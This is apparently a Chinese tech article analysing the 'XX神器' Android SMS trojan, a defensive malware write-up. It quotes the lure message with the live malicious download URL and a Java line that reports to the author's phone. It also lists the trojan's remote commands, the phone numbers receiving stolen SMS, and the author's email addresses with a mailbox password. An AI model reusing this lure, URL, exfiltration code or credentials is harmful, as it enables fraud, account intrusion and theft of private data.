超级病毒“xxshenqi.［XX神器］”到底有多牛

该木马从8月2日同时也是“七夕”，“XX神器”借节日疯狂传播。
以下6大主要危害：
      1、群发诈骗短信。读取手机通讯录中的联系人列表，并向所有联系人群发包括木马下载地址的欺诈短信，极具扩散能力。短信中会显示短信接受者的姓名，极具迷惑性：[联系人姓名] + “看这个，” +”http://cdn.yyupload.com/down/4279193/XXshenqi.apk”
      2、窃取隐私信息。“XX神器”打开后，会要求用户填写用户名、密码、姓名及身份证号等隐私信息，提交后会发到一个指定的手机号码上。
      3、可拦截特定号码并且解释指令，可伪造或删除任何短信内容。
      4、会转发手机中所有短信到指定的手机号码。
      5、得到作者远程指令后，将隐私信息发送指定邮箱。
      6“XX神器”安装时会同时释放具备更多恶意行为的恶意子包，恶意子包一旦安装，会将图标隐藏，即使删除了“XX神器”，木马依然可以作恶。

@@@1.首先获取手机中所有的联系人信息，然后群发一条短信，内容如下：
[联系人姓名] + “看这个，” +”http://cdn.yyupload.com/down/4279193/XXshenqi.apk”骗取本机联系人点击恶意链接下载病毒进行传播。
发送成功后，执行：
SmsManager.getDefault().sendTextMessage(“18670259904″, null, “XXshenqi 群发链接OK”, null, null);
 

 

@@@2.在MainActivity中弹出 showInstallConfirmDialog安装一个com.example.com.android.trogoogle的文件，这个文件存在于xxshenqi.apk解压后文件的assets目录下。

安装木马后，会自动隐藏图标。

 

 
 
@@@3.同时弹出一个登录框，只不过这个是个幌子，怎么输入都会出现密码错误或者账户不存在，将用户导入到一个注册页面：RegisterActivity中,如果点击了注册按钮那么很不幸，你的信息就会发送到作者的手机上。
 

 

@@@4.子包安装后隐藏图标，xxshenqi.apk的任务基本是完成了，即使用户卸载也无所谓，因为木马已经在刚开始就被释放了，打开了一个ListenMessageService的服务，在后台运行，这才是他的终极目的.

 
 
@@@5.拦截特定号码，解释指令

 

readmessage 发送邮件命令，sendmessage发送短信命令
 
makemessage伪造短信命令，sendlink发送连接的命令
 
 
@@@6.开启SmsObserver监控短信
 
 

@@@7.判断是否是淘宝网购信息和普通短信发送到指定号码：18163657397

 
@@@8.MySendEmailService这个服务就是给作者发送电子邮件。邮箱地址：a137736513@qq.com，a137736513@qq.com，137736513@qq.com
密码是：lishulili.

说的这里小编只能对作者说“No zuo no die. ”